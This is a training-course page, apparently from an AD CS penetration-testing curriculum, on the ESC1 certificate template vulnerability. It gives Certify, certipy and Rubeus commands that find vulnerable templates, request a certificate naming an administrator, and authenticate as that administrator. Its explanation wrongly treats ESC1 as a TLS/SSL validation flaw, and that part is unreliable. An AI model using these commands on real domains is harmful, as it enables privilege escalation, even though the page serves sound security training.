ADCS Certified Enterprise Security Professional
HomeAuthor
  • CESP Certification
  • 🔥RFS Methodology
    • Pwning
  • 1️⃣ Learn AD CS (Module 1)
    • Active Directory Certificate Services (AD CS)
    • 🟢AD CS Components
    • 🟢Certificate Formats
    • Certificate Attributes
    • Containers in AD
  • 2️⃣ AD CS Attacks (Module 2)
    • Attack
    • Prevention
    • Detection
  • 3️⃣ Basics of AD CS Attacks (Module 3)
    • Tools
    • AV Bypass
    • Payload Delivery
    • 🟢Bypass PowerShell Logging
    • WinRS
    • 🟢Certificate Management
    • 🟢Pass the Cert
    • 🟢UnPAC the Hash
    • 🟢S4U2Self Attack
  • 4️⃣ AD CS Patches (Module 4)
    • 🟢CBA patch
    • 🟢ADCS SID Extension Policy Module
  • 5️⃣ AD CS Enumeration (Module 5)
    • 🥰Methodology
    • Tools
    • 🟢CAs Info
    • Groups
    • Extract the Private Key
  • 6️⃣ AD CS Local Privilege Escalation (Module 6)
    • 🟢CertPotato
    • 🟢ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability
  • AD CS Domain Privilege Escalation
    • Page 3
  • AD CS Pivoting and Lateral Movement
    • Page 4
  • AD CS Theft and Collection
    • Page 5
  • AD CS Local and Domain Persistence
    • Page 6
  • Abusing Cross Forest and External Trusted CAs
    • Page 7
  • Abusing Azure CBA for Lateral Movement and Persistence on Cloud
    • Page 8
  • Evasion and Bypasses
    • Page 9
  • Group 1
    • Page 2
Powered by GitBook
On this page

Was this helpful?

  1. 6️⃣ AD CS Local Privilege Escalation (Module 6)

ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols.

This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.

It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

  • Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.

  • Use Certificate Transparency logs to monitor and identify potentially malicious certificates.

  • Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable
certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 

PreviousCertPotatoNextPage 3

Last updated 9 months ago

Was this helpful?

🟢